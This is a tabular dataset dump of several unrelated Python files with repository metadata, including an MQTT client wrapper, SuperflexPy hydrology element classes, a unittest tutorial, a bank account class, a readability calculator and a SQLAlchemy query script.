blob_id stringlengths 40 40 | language stringclasses 1
value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30
values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2
values | text stringlengths 12 5.47M | download_success bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
b6caef7261fe05f05935b689f38e7759e42a4851 | Python | magasser/augis | /controls/raspberry-pi/mqtt.py | UTF-8 | 1,245 | 2.71875 | 3 | [] | no_license | """
Authors: Manuel Gasser, Julian Haldimann
Created: 02.03.2021
Last Modified: 08.05.2021
"""
import logging as log
import paho.mqtt.client as mqtt
import thread_handler as th
from config import Config
class Mqtt(mqtt.Client):
    """Thin wrapper around paho's Client adding a lock-protected publish,
    a subscribe helper, and a connect helper that reads credentials from
    :class:`Config`."""

    def pub(self, topic, payload, qos=1, retain=False):
        """
        Publish a payload to a specific topic.

        :param topic: The topic is the place where the message should be published
        :param payload: The payload is the data that should be published
        :param qos: Quality-of-service level for the publish (default 1)
        :param retain: Whether the broker should retain this message
        """
        with th.locks["pub_lock"]:
            # BUG FIX: forward the caller's qos instead of the hard-coded 1,
            # so the qos parameter actually has an effect.
            self.publish(topic, payload, qos=qos, retain=retain)

    def sub(self, topic, qos=1):
        """
        Subscribe to a specific topic to receive messages.

        :param topic: The topic is the route where the message appears
        :param qos: Quality-of-service level for the subscription
        """
        self.subscribe(topic, qos=qos)

    def connect_to_client(self, domain=Config.DOMAIN, port=Config.PORT, keepalive=60):
        """
        Connect to the MQTT broker using the username and password from Config.

        :param domain: Broker hostname (default Config.DOMAIN)
        :param port: Broker port (default Config.PORT)
        :param keepalive: Keepalive interval in seconds (default 60)
        """
        self.username_pw_set(Config.USER, Config.PASSWORD)
        try:
            self.connect(domain, port, keepalive=keepalive)
        except (ConnectionError, OSError, ValueError) as err:
            log.error(f"Could not connect to MQTT on: {domain}:{port}, Stacktrace {err}")
| true |
2149216e3f81ec28af5881759681e6327900c63e | Python | NatanBagrov/DeepLearning | /hw2/graph/GraphNode.py | UTF-8 | 405 | 2.546875 | 3 | [] | no_license | from abc import abstractmethod
class GraphNode:
    """Abstract base class for a node in a computation graph.

    Subclasses implement the forward/backward passes; the value computed
    by forward() is expected to be cached in ``self._value``.

    NOTE(review): the class does not inherit from ``abc.ABC``, so the
    ``@abstractmethod`` decorators are not enforced at instantiation time.
    """
    def __init__(self):
        # Cached output of the last forward pass (None until computed).
        self._value = None
    def get_value(self):
        # Return the cached value (None before the first forward pass).
        return self._value
    @abstractmethod
    def forward(self):
        # Compute this node's value from its inputs; must be overridden.
        raise NotImplementedError()
    @abstractmethod
    def backward(self, grads=None):
        # Propagate gradients (grads from downstream, if any); must be overridden.
        raise NotImplementedError()
    @abstractmethod
    def reset(self):
        # Clear cached state before a new forward pass; must be overridden.
        raise NotImplementedError()
| true |
c6247e1c3a4939c447a00ea9afe24c8311912403 | Python | guoyujiao/cookbook | /py/testing/_unittest.py | UTF-8 | 5,174 | 3.375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''@package py
Unit Testing Cookbook.
The Python unit testing framework, sometimes referred to as “PyUnit,” is a
Python language version of JUnit, by *Kent Beck* and *Erich Gamma*. JUnit is,
in turn, a Java version of Kent’s Smalltalk testing framework. Each is the de
facto standard unit testing framework for its respective language.
To achieve this, `unittest` supports some important testing concepts:
- test fixture
> A **test fixture** represents the preparation needed to perform one or more
> tests, and any associate clean-up actions. This may involve, for example,
> creating temporary or proxy databases, directories, or starting a server
> process.
- test case
> A **test case** is the smallest unit of testing. It checks for a specific
> response to a particular set of inputs. `unittest` provides a base class,
> `TestCase`, which may be used to create new test cases.
- test suite
> A **test suite** is a collection of test cases, test suites, or both. It is
> used to aggregate tests that should be executed together.
- test runner
> A **test runner** is a component which orchestrates the execution of tests
> and provides the outcome to the user. The runner may use a graphical
> interface, a textual interface, or return a special value to indicate the
> results of executing the tests.
Copyright (c) 2014 Li Yun <leven.cn@gmail.com>
All Rights Reserved.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import unittest
def func_1():
    '''Do nothing and return None.
    '''
    return None
def func_2(a):
    '''Identity function: return the argument unchanged (echo).
    '''
    result = a
    return result
def func_3():
    '''Raise an exception (ValueError).

    @exception ValueError

    >>> func_3()
    Traceback (most recent call last):
        ...
    ValueError: error description
    '''
    # BUG FIX: the doctest above previously called func_4(), which does not
    # exist; it must exercise this function, func_3().
    raise ValueError("error description")
class _UnitTestTestCase(unittest.TestCase):
    '''Demonstration TestCase.

    Shows the unittest fixture hooks (setUp/tearDown), the skip decorators,
    and the standard assert* helpers, exercised against func_1/func_2/func_3.
    '''
    def setUp(self):
        # Initialization (runs before every test method)
        pass
    def tearDown(self):
        # Clean up (runs after every test method, even on failure)
        pass
    #@unittest.skip("<reason>")
    #@unittest.skipIf(<condition>, "<reason>")
    #@unittest.skipUnless(<condition>, "<reason>")
    #@unittest.expectedFailure
    def test_func_1(self):
        # Testing
        #
        # self.assertTrue(a) a
        # self.assertFalse(a) not a
        # self.assertIs(a, b) a is b
        # self.assertIsNot(a, b) a is not b
        # self.assertIsNone(a) a is None
        # self.assertIsNotNone(a) a is not None
        # self.assertIn(a, b) a in b
        # self.assertNotIn(a, b) a not in b
        # self.assertIsInstance(a, b) isinstance(a, b)
        # self.assertNotIsInstance(a, b) not isinstance(a, b)
        # self.assertEqual(a, b) a == b
        # self.assertNotEqual(a, b) a != b
        # self.assertGreater(a, b) a > b
        # self.assertLess(a ,b) a < b
        # self.assertGreaterEqual(a, b) a >= b
        # self.assertLessEqual(a, b) a <= b
        #
        # with self.assertRaises(Error): raise Error
        # func(a, b)
        pass
    def test_func_2(self):
        # One example per assert* helper, all against the echo function.
        self.assertTrue(func_2(True))
        self.assertFalse(func_2(False))
        self.assertIs(func_2(None), None)
        self.assertIsNot(func_2([1,2]), None)
        self.assertIsNone(func_2(None))
        self.assertIn(func_2(1), [1,2])
        self.assertNotIn(func_2(3), [1,2])
        self.assertIsInstance(func_2(1), int)
        self.assertNotIsInstance(func_2(1), str)
        self.assertEqual(func_2(1), 1)
        self.assertNotEqual(func_2(1), 2)
        self.assertGreater(func_2(1), 0)
        self.assertGreaterEqual(func_2(1), 0)
        self.assertGreaterEqual(func_2(1), 1)
        self.assertLess(func_2(1), 2)
        self.assertLessEqual(func_2(1), 2)
        self.assertLessEqual(func_2(1), 1)
    def test_func_3(self):
        # func_3 must raise ValueError.
        with self.assertRaises(ValueError):
            func_3()
def load_tests(loader, tests, ignore):
    '''Doc-testing integrating with unit-testing.

    Standard unittest "load_tests protocol" hook: when defined at module
    level, unittest uses it to build this module's suite. Here it appends
    the doctests found in the sibling ``_doctest`` module to the suite.
    '''
    import doctest
    import _doctest
    # exclude_empty=False also collects objects without docstrings.
    finder = doctest.DocTestFinder(exclude_empty=False)
    suite = doctest.DocTestSuite(_doctest, test_finder=finder)
    tests.addTests(suite)
    return tests
if __name__ == '__main__':
    # Discover and run all tests in this module (including the doctests
    # added by load_tests above).
    unittest.main()
| true |
805f3766860b7ecc6605cf0a1386655385bf168c | Python | exepulveda/superflexPy | /superflexpy/framework/element.py | UTF-8 | 25,178 | 3.0625 | 3 | [
"Apache-2.0"
] | permissive | """
Copyright 2020 Marco Dal Molin et al.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
This file is part of the SuperflexPy modelling framework. For details about it,
visit the page https://superflexpy.readthedocs.io
CODED BY: Marco Dal Molin
DESIGNED BY: Marco Dal Molin, Fabrizio Fenicia
This file contains the implementation of Element classes with different levels
of specialization.
"""
from copy import deepcopy, copy
import numpy as np
class BaseElement():
    """
    This is the abstract class for the creation of a BaseElement. A BaseElement
    does not have parameters or states.
    """

    _num_downstream = None
    """
    Number of downstream elements
    """

    _num_upstream = None
    """
    Number of upstream elements
    """

    input = {}
    """
    Dictionary of input fluxes
    """

    def __init__(self, id):
        """
        This is the initializer of the abstract class BaseElement.

        Parameters
        ----------
        id : str
            Identifier of the element. All the elements of the framework must
            have an identifier.
        """

        self.id = id
        # Pre-built prefix used by every error raised from this element.
        self._error_message = 'module : superflexPy, Element : {},'.format(id)
        self._error_message += ' Error message : '

    def set_input(self, input):
        """
        To be implemented by any child class. It populates the self.input
        dictionary.

        Parameters
        ----------
        input : list(numpy.ndarray)
            List of input fluxes to the element.
        """

        raise NotImplementedError('The set_input method must be implemented')

    def get_output(self, solve=True):
        """
        To be implemented by any child class. It solves the element and returns
        the output fluxes.

        Parameters
        ----------
        solve : bool
            True if the element has to be solved (i.e. calculate the states).

        Returns
        -------
        list(numpy.ndarray)
            List of output fluxes.
        """

        raise NotImplementedError('The get_output method must be implemented')

    @property
    def num_downstream(self):
        """
        Number of downstream elements.
        """
        return self._num_downstream

    @property
    def num_upstream(self):
        """
        Number of upstream elements
        """
        return self._num_upstream

    def __repr__(self):
        # Local renamed from 'str' to avoid shadowing the builtin.
        text = 'Module: superflexPy\nElement: {}\n'.format(self.id)
        return text

    def __copy__(self):
        ele = self.__class__(id=self.id)
        return ele

    def __deepcopy__(self, memo):
        ele = self.__class__(id=self.id)
        return ele
class ParameterizedElement(BaseElement):
    """
    This is the abstract class for the creation of a ParameterizedElement. A
    ParameterizedElement has parameters but not states.
    """

    _prefix_parameters = ''
    """
    Prefix applied to the original names of the parameters
    """

    def __init__(self, parameters, id):
        """
        This is the initializer of the abstract class ParameterizedElement.

        Parameters
        ----------
        parameters : dict
            Parameters controlling the element. The parameters can be either
            a float (constant in time) or a numpy.ndarray of the same length
            of the input fluxes (time variant parameters).
        id : str
            Identifier of the element. All the elements of the framework must
            have an identifier.
        """

        BaseElement.__init__(self, id)
        self._parameters = parameters
        self.add_prefix_parameters(id)

    def get_parameters(self, names=None):
        """
        This method returns the parameters of the element.

        Parameters
        ----------
        names : list(str)
            Names of the parameters to return. The names must be the ones
            returned by the method get_parameters_name. If None, all the
            parameters are returned.

        Returns
        -------
        dict:
            Parameters of the element.
        """

        if names is None:
            return self._parameters
        else:
            return {n: self._parameters[n] for n in names}

    def get_parameters_name(self):
        """
        This method returns the names of the parameters of the element.

        Returns
        -------
        list(str):
            List with the names of the parameters.
        """

        return list(self._parameters.keys())

    def set_parameters(self, parameters):
        """
        This method sets the values of the parameters.

        Parameters
        ----------
        parameters : dict
            Contains the parameters of the element to be set. The keys must be
            the ones returned by the method get_parameters_name. Only the
            parameters that have to be changed should be passed.
        """

        for k in parameters.keys():
            if k not in self._parameters.keys():
                message = '{}The parameter {} does not exist'.format(self._error_message, k)
                raise KeyError(message)
            self._parameters[k] = parameters[k]

    def add_prefix_parameters(self, prefix):
        """
        This method add a prefix to the name of the parameters of the element.

        Parameters
        ----------
        prefix : str
            Prefix to be added. It cannot contain '_'.
        """

        if '_' in prefix:
            message = '{}The prefix cannot contain \'_\''.format(self._error_message)
            raise ValueError(message)

        # Extract the prefixes in the parameters name
        splitted = list(self._parameters.keys())[0].split('_')

        if prefix not in splitted:
            # Apply the prefix
            for k in list(self._parameters.keys()):
                value = self._parameters.pop(k)
                self._parameters['{}_{}'.format(prefix, k)] = value

            # Save the prefix for future uses
            self._prefix_parameters = '{}_{}'.format(prefix, self._prefix_parameters)

    def __repr__(self):
        # Local renamed from 'str' to avoid shadowing the builtin.
        text = 'Module: superflexPy\nElement: {}\n'.format(self.id)
        text += 'Parameters:\n'
        for k in self._parameters:
            text += '\t{} : {}\n'.format(k, self._parameters[k])
        return text

    def __copy__(self):
        p = self._parameters  # Only the reference
        ele = self.__class__(parameters=p,
                             id=self.id)
        ele._prefix_parameters = self._prefix_parameters
        return ele

    def __deepcopy__(self, memo):
        p = deepcopy(self._parameters)  # Create a new dictionary
        ele = self.__class__(parameters=p,
                             id=self.id)
        ele._prefix_parameters = self._prefix_parameters
        return ele
class StateElement(BaseElement):
    """
    This is the abstract class for the creation of a StateElement. A
    StateElement has states but not parameters.
    """

    _prefix_states = ''
    """
    Prefix applied to the original names of the states
    """

    def __init__(self, states, id):
        """
        This is the initializer of the abstract class StateElement.

        Parameters
        ----------
        states : dict
            Initial states of the element. Depending on the element the states
            can be either a float or a numpy.ndarray.
        id : str
            Identifier of the element. All the elements of the framework must
            have an id.
        """

        BaseElement.__init__(self, id)
        self._states = states
        self._init_states = deepcopy(states)  # It is used to re-set the states
        self.add_prefix_states(id)

    def get_states(self, names=None):
        """
        This method returns the states of the element.

        Parameters
        ----------
        names : list(str)
            Names of the states to return. The names must be the ones
            returned by the method get_states_name. If None, all the
            states are returned.

        Returns
        -------
        dict:
            States of the element.
        """

        if names is None:
            return self._states
        else:
            return {n: self._states[n] for n in names}

    def get_states_name(self):
        """
        This method returns the names of the states of the element.

        Returns
        -------
        list(str):
            List with the names of the states.
        """

        return list(self._states.keys())

    def set_states(self, states):
        """
        This method sets the values of the states.

        Parameters
        ----------
        states : dict
            Contains the states of the element to be set. The keys must be
            the ones returned by the method get_states_name. Only the
            states that have to be changed should be passed.
        """

        for k in states.keys():
            if k not in self._states.keys():
                message = '{}The state {} does not exist'.format(self._error_message, k)
                raise KeyError(message)
            self._states[k] = states[k]

    def reset_states(self):
        """
        This method sets the states to the values provided to the __init__
        method. If a state was initialized as None, it will not be reset.
        """

        for k in self._init_states.keys():
            k_no_prefix = k.split('_')[-1]
            if self._init_states[k] is not None:
                self._states[self._prefix_states + k_no_prefix] = deepcopy(self._init_states[k])  # I have to isolate

    def add_prefix_states(self, prefix):
        """
        This method add a prefix to the id of the states of the element.

        Parameters
        ----------
        prefix : str
            Prefix to be added. It cannot contain '_'.
        """

        if '_' in prefix:
            message = '{}The prefix cannot contain \'_\''.format(self._error_message)
            raise ValueError(message)

        # Extract the prefixes in the states name
        splitted = list(self._states.keys())[0].split('_')

        if prefix not in splitted:
            # Apply the prefix
            for k in list(self._states.keys()):
                value = self._states.pop(k)
                self._states['{}_{}'.format(prefix, k)] = value

            # Save the prefix for future uses
            self._prefix_states = '{}_{}'.format(prefix, self._prefix_states)

    def __repr__(self):
        # Local renamed from 'str' to avoid shadowing the builtin.
        text = 'Module: superflexPy\nElement: {}\n'.format(self.id)
        text += 'States:\n'
        for k in self._states:
            text += '\t{} : {}\n'.format(k, self._states[k])
        return text

    def __copy__(self):
        s = deepcopy(self._states)  # Create a new dictionary
        ele = self.__class__(states=s,
                             id=self.id)
        ele._prefix_states = self._prefix_states
        return ele

    def __deepcopy__(self, memo):
        s = deepcopy(self._states)  # Create a new dictionary
        ele = self.__class__(states=s,
                             id=self.id)
        ele._prefix_states = self._prefix_states
        return ele
class StateParameterizedElement(StateElement, ParameterizedElement):
    """
    This is the abstract class for the creation of a StateParameterizedElement.
    A StateParameterizedElement has parameters and states.
    """

    def __init__(self, parameters, states, id):
        """
        This is the initializer of the abstract class
        StateParameterizedElement.

        Parameters
        ----------
        parameters : dict
            Parameters controlling the element. The parameters can be either
            a float (constant in time) or a numpy.ndarray of the same length
            of the input fluxes (time variant parameters).
        states : dict
            Initial states of the element. Depending on the element the states
            can be either a float or a numpy.ndarray.
        id : str
            Identifier of the element. All the elements of the framework must
            have an id.
        """

        # Explicit base-class calls (not super()) so each initializer runs
        # exactly once with its own arguments.
        StateElement.__init__(self, states, id)
        ParameterizedElement.__init__(self, parameters, id)

    def __repr__(self):
        # Local renamed from 'str' to avoid shadowing the builtin.
        text = 'Module: superflexPy\nElement: {}\n'.format(self.id)
        text += 'Parameters:\n'
        for k in self._parameters:
            text += '\t{} : {}\n'.format(k, self._parameters[k])
        text += 'States:\n'
        for k in self._states:
            text += '\t{} : {}\n'.format(k, self._states[k])
        return text

    def __copy__(self):
        p = self._parameters  # Only the reference
        s = deepcopy(self._states)  # Create a new dictionary
        ele = self.__class__(parameters=p,
                             states=s,
                             id=self.id)
        ele._prefix_states = self._prefix_states
        ele._prefix_parameters = self._prefix_parameters
        return ele

    def __deepcopy__(self, memo):
        p = deepcopy(self._parameters)  # Create a new dictionary
        s = deepcopy(self._states)  # Create a new dictionary
        ele = self.__class__(parameters=p,
                             states=s,
                             id=self.id)
        ele._prefix_states = self._prefix_states
        ele._prefix_parameters = self._prefix_parameters
        return ele
class ODEsElement(StateParameterizedElement):
    """
    This is the abstract class for the creation of a ODEsElement. An ODEsElement
    is an element with states and parameters that is controlled by an ordinary
    differential equation, of the form:

    dS/dt = input - output
    """

    _num_upstream = 1
    """
    Number of upstream elements
    """

    _num_downstream = 1
    """
    Number of downstream elements
    """

    _solver_states = []
    """
    List of states used by the solver of the differential equation
    """

    _fluxes = []
    """
    This attribute contains a list of methods (one per differential equation)
    that calculate the values of the fluxes needed to solve the differential
    equations that control the element. The single functions must return the
    fluxes as a list where incoming fluxes are positive and outgoing are
    negative. Here is a list of the required outputs of the single functions:

    list(floats)
        Values of the fluxes given states, inputs, and parameters.
    float
        Minimum value of the state. Used, sometimes, by the numerical solver
        to search for the solution.
    float
        Maximum value of the state. Used, sometimes, by the numerical solver
        to search for the solution.
    """

    def __init__(self, parameters, states, approximation, id):
        """
        This is the initializer of the abstract class ODEsElement.

        Parameters
        ----------
        parameters : dict
            Parameters controlling the element. The parameters can be either
            a float (constant in time) or a numpy.ndarray of the same length
            of the input fluxes (time variant parameters).
        states : dict
            Initial states of the element. Depending on the element the states
            can be either a float or a numpy.ndarray.
        approximation : superflexpy.utils.numerical_approximation.NumericalApproximator
            Numerial method used to approximate the differential equation
        id : str
            Identifier of the element. All the elements of the framework must
            have an id.
        """

        StateParameterizedElement.__init__(self, parameters=parameters,
                                           states=states, id=id)
        # Numerical approximator used by _solve_differential_equation.
        self._num_app = approximation

    def set_timestep(self, dt):
        """
        This method sets the timestep used by the element.

        Parameters
        ----------
        dt : float
            Timestep
        """
        self._dt = dt

    def get_timestep(self):
        """
        This method returns the timestep used by the element.

        Returns
        -------
        float
            Timestep
        """
        return self._dt

    def define_numerical_approximation(self, approximation):
        """
        This method define the solver to use for the differential equation.

        Parameters
        ----------
        approximation : superflexpy.utils.root_finder.RootFinder
            Solver used to find the root(s) of the differential equation(s).
            Child classes may implement their own solver, therefore the type
            of the solver is not enforced.
        """
        self._num_app = approximation

    def _solve_differential_equation(self, **kwargs):
        """
        This method calls the solver of the differential equation(s). When
        called, it solves the differential equation(s) for all the timesteps
        and populates self.state_array.
        """
        if len(self._solver_states) == 0:
            message = '{}the attribute _solver_states must be filled'.format(self._error_message)
            raise ValueError(message)
        # The dict comprehension strips this element's prefix from the
        # parameter names so the flux functions receive them under their
        # original (bare) names, alongside the input fluxes and any extras.
        self.state_array = self._num_app.solve(fun=self._fluxes,
                                               S0=self._solver_states,
                                               dt=self._dt,
                                               **self.input,
                                               **{k[len(self._prefix_parameters):]: self._parameters[k] for k in self._parameters},
                                               **kwargs)

    def __copy__(self):
        p = self._parameters  # Only the reference
        s = deepcopy(self._states)  # Create a new dictionary
        # NOTE(review): the approximator is shared (not copied) on purpose.
        ele = self.__class__(parameters=p,
                             states=s,
                             id=self.id,
                             approximation=self._num_app)
        ele._prefix_states = self._prefix_states
        ele._prefix_parameters = self._prefix_parameters
        return ele

    def __deepcopy__(self, memo):
        p = deepcopy(self._parameters)  # Create a new dictionary
        s = deepcopy(self._states)  # Create a new dictionary
        ele = self.__class__(parameters=p,
                             states=s,
                             id=self.id,
                             approximation=self._num_app)
        ele._prefix_states = self._prefix_states
        ele._prefix_parameters = self._prefix_parameters
        return ele
class LagElement(StateParameterizedElement):
    """
    This is the abstract class for the creation of a LagElement. An LagElement
    is an element with states and parameters that distributes the incoming
    fluxes according to a weight array

    Parameters must be called:

    - 'lag-time': characteristic time of the lag. Its definition depends on the
      specific implementations of the element. It can be a scalar (it will be
      applied to all the fluxes) or a list (with length equal to the number of
      fluxes).

    States must be called:

    - lag: initial state of the lag function. If None it will be initialized
      to zeros. It can be a numpy.ndarray (it will be applied to all the fluxes)
      of a list on numpy.ndarray (with length equal to the number of fluxes).
    """

    _num_upstream = 1
    """
    Number of upstream elements
    """

    _num_downstream = 1
    """
    Number of downstream elements
    """

    def _build_weight(self, lag_time):
        """
        This method must be implemented by any child class. It calculates the
        weight array(s) based on the lag_time.

        Parameters
        ----------
        lag_time : float
            Characteristic time of the lag function.

        Returns
        -------
        list(numpy.ndarray)
            List of weight array(s).
        """

        raise NotImplementedError('The _build_weight method must be implemented')

    def set_input(self, input):
        """
        This method sets the inputs to the elements. Since the name of the
        inputs is not important, the fluxes are stored as list.

        Parameters
        ----------
        input : list(numpy.ndarray)
            List of input fluxes.
        """

        self.input = input

    def get_output(self, solve=True):
        """
        This method returns the output of the LagElement. It applies the lag
        to all the incoming fluxes, according to the weight array(s).

        Parameters
        ----------
        solve : bool
            True if the element has to be solved (i.e. calculate the states).

        Returns
        -------
        list(numpy.ndarray)
            List of output fluxes.
        """

        if solve:
            # Create lists if we are dealing with scalars
            if isinstance(self._parameters[self._prefix_parameters + 'lag-time'], float):
                lag_time = [self._parameters[self._prefix_parameters + 'lag-time']] * len(self.input)
            elif isinstance(self._parameters[self._prefix_parameters + 'lag-time'], list):
                lag_time = self._parameters[self._prefix_parameters + 'lag-time']
            else:
                par_type = type(self._parameters[self._prefix_parameters + 'lag-time'])
                message = '{}lag_time parameter of type {}'.format(self._error_message, par_type)
                raise TypeError(message)
            # A None state means "not initialized yet": build zero arrays
            # sized from the lag times.
            if self._states[self._prefix_states + 'lag'] is None:
                lag_state = self._init_lag_state(lag_time)
            else:
                if isinstance(self._states[self._prefix_states + 'lag'], np.ndarray):
                    lag_state = [copy(self._states[self._prefix_states + 'lag'])] * len(self.input)
                elif isinstance(self._states[self._prefix_states + 'lag'], list):
                    lag_state = self._states[self._prefix_states + 'lag']
                else:
                    state_type = type(self._states[self._prefix_states + 'lag'])
                    message = '{}lag state of type {}'.format(self._error_message, state_type)
                    raise TypeError(message)
            self._weight = self._build_weight(lag_time)
            self.state_array = self._solve_lag(self._weight, lag_state, self.input)
            # Get the new lag value to restart: shift the last state left by
            # one slot (its first cell has already been emitted as output).
            final_states = self.state_array[-1, :, :]
            final_states[:, :-1] = final_states[:, 1:]
            final_states[:, -1] = 0
            self.set_states({self._prefix_states + 'lag': [final_states[i, :len(w)] for i, w in enumerate(self._weight)]})
        # Output of flux i at each timestep is the first cell of its lag state.
        return [self.state_array[:, i, 0] for i in range(len(self.input))]

    def reset_states(self):
        """
        This method sets the states to the values provided to the __init__
        method. In this case, if a state was initialized as None, it will be
        set back to None.
        """

        for k in self._init_states.keys():
            k_no_prefix = k.split('_')[-1]
            self._states[self._prefix_states + k_no_prefix] = deepcopy(self._init_states[k])  # I have to isolate

    @staticmethod
    def _solve_lag(weight, lag_state, input):
        """
        This method distributes the input fluxes according to the weight array
        and the initial state.

        Parameters
        ----------
        weight : list(numpy.ndarray)
            List of weights to use
        lag_state : list(numpy.ndarray)
            List of the initial states of the lag.
        input : list(numpy.ndarray)
            List of fluxes

        Returns
        -------
        numpy.ndarray
            3D array (dimensions: number of timesteps, number of fluxes, max
            lag length) that stores all the states of the lag in time
        """

        max_length = max([len(w) for w in weight])
        output = np.zeros((len(input[0]), len(weight), max_length))  # num_ts, num_fluxes, len_lag
        for flux_num, (w, ls, i) in enumerate(zip(weight, lag_state, input)):
            for ts in range(len(input[0])):
                # Spread this timestep's input over the lag buffer, record
                # the buffer, then shift it left by one for the next step.
                updated_state = ls + i[ts] * w
                output[ts, flux_num, :len(w)] = updated_state[:]
                ls = np.append(updated_state[1:], 0)
        return output

    def _init_lag_state(self, lag_time):
        """
        This method sets the initial state of the lag to arrays of proper
        length.

        Parameters
        ----------
        lag_time : list(float)
            List of lag times

        Returns
        -------
        list(numpy.ndarray)
            List of the initial states of the lag.
        """

        ini_state = []
        for i in range(len(self.input)):
            # One zero per (rounded-up) lag step for each flux.
            ini_state.append(np.zeros(int(np.ceil(lag_time[i]))))
        return ini_state
| true |
def cipher(sents):
    """Mirror every lowercase letter (a<->z, b<->y, ...) and leave every
    other character untouched. Applying the cipher twice restores the input.
    """
    def _flip(ch):
        # ord('a') + ord('z') == 219, so 219 - ord(ch) mirrors the alphabet.
        return chr(219 - ord(ch)) if ch.islower() else ch
    return ''.join(_flip(ch) for ch in sents)
sent = "Now I need a drink, alcoholic of course, after the heavy lectures involving quantum mechanics."
# Encrypt the sentence (mirror each lowercase letter) and show the result.
sent = cipher(sent)
print(sent)
# The cipher is an involution: applying it again prints the original text.
print(cipher(sent))
class BankAccount:
    """Simple bank account with an interest rate.

    Every created account is registered in the class-level ``Accounts`` list
    so printAccounts() can report on all of them. Mutating methods return
    ``self`` to allow call chaining.
    """

    Accounts = []  # registry of every account ever created

    def __init__(self, int_rate, balance=0):
        """
        int_rate : interest rate applied by yield_interest (e.g. 0.1 = 10%).
        balance  : opening balance (default 0).
        """
        self.int_rate = int_rate
        self.balance = balance
        BankAccount.Accounts.append(self)

    def deposit(self, amount):
        """Add amount to the balance; returns self for chaining."""
        self.balance += amount
        return self

    def withdraw(self, amount):
        """Remove amount if funds suffice, otherwise charge a $5 fee.

        Returns self for chaining.
        """
        # BUG FIX: use <= so withdrawing exactly the full balance succeeds
        # instead of being treated as insufficient funds.
        if amount <= self.balance:
            self.balance -= amount
        else:
            print("Insufficient funds: Charging a $5 fee")
            self.balance -= 5
        return self

    def display_account_info(self):
        """Print the current balance."""
        print(f"Balance: ${self.balance}")

    def yield_interest(self):
        """Apply int_rate to a positive balance; returns self for chaining."""
        if self.balance > 0:
            self.balance += self.balance * self.int_rate
        return self

    @classmethod
    def printAccounts(cls):
        """Print the info of every account created so far."""
        print(f"\nThere are {len(cls.Accounts)} bank accounts:")
        for i in cls.Accounts:
            print(f"\nAccount #{cls.Accounts.index(i)+1}")
            i.display_account_info()
# Demo: two accounts exercised through chained deposit/withdraw calls.
ac1 = BankAccount(0.1,15)
ac1.deposit(10).deposit(15).deposit(25).withdraw(20).yield_interest().display_account_info()
ac2=BankAccount(0.2,5)
# The final withdraw(100) exceeds the remaining balance and triggers the fee.
ac2.deposit(10).deposit(50).withdraw(1).withdraw(2).withdraw(8).withdraw(100).yield_interest().display_account_info()
BankAccount.printAccounts()
eb4ce8d1b60c42ecc1a1499d470e94c0b76920b6 | Python | sriyuthsagi/CSCI-1100-Computer-Science-I | /Homework/Homework 3/Homework_3_1.py | UTF-8 | 868 | 3.296875 | 3 | [] | no_license | #import
import syllables
#variable input
para = input('Enter a paragraph => ')
print(para)
para1 = para
para = para.split()
length = len(para)
hard = []
syll = 0
#while loop (count hard words and syllables
i = 0
while i < length:
ln = syllables.find_num_syllables(para[i])
syll = syll + ln
if ln > 2:
if not '-' in para[i] or para[i].endswith(('es', 'ed')):
hard.append(para[i])
i += 1
#data processing
ASL = length / para1.count('.')
PHW = (len(hard) / length) * 100
ASYL = syll / length
GFRI = 0.4*(ASL + PHW)
FKRI = 206.835-1.015*ASL-86.4*ASYL
#printing results
print('Here are the hard words in this paragraph:\n', hard)
print('Statistics: ASL:{0:.2f} PHW:{1:.2f}% ASYL:{2:.2f}'.format(ASL, PHW, ASYL))
print('Readability index (GFRI): {0:.2f}'.format(GFRI))
print('Readability index (GFRI): {0:.2f}'.format(FKRI))
| true |
285cdcd75bacac75dbdd1e50579d3574cd815346 | Python | HugoOliveiraSoares/CursoPython | /Listas.py | UTF-8 | 286 | 3.640625 | 4 | [] | no_license | #Iterando listas
lista_num = [100,200,300,400,500,700,50]
#lista_indice = range(4) #[0,1,2,3]
'''
for item in range(len(lista_num)):
    lista_num[item] += 1000
print(lista_num)
'''
# enumerate() yields (index, item) pairs, so each element can be
# incremented in place by index.
for idx,item in enumerate(lista_num):
    lista_num[idx] += 1000
print(lista_num)
| true |
fc297db360edbf0b29868ee2b6211a2cf098401d | Python | ProtoplasmaDS/Football_ORM2 | /query.py | UTF-8 | 516 | 2.796875 | 3 | [] | no_license | from FootballORM.db.database import use_db,engine, Base, delete_all
from FootballORM.model.my_model import Team,Player
from sqlalchemy import select, text
session = use_db()
# Fetch the first Team row (table order; no explicit ORDER BY) and list its players.
first_rec=session.query(Team).first()
print(f"Team: {first_rec.name}")
for n in first_rec.players:
    print(f"player: {n.name}")
print("*"*80)
#
# OK lets try and get Newcastle
#
# NOTE(review): .first() returns None when no Team named "Newcastle" exists,
# which would make the prints below raise AttributeError.
nufc_recs=session.query(Team).filter(Team.name=="Newcastle").first()
print(f"Team: {nufc_recs.name}")
for n in nufc_recs.players:
    print(f"player: {n.name}")
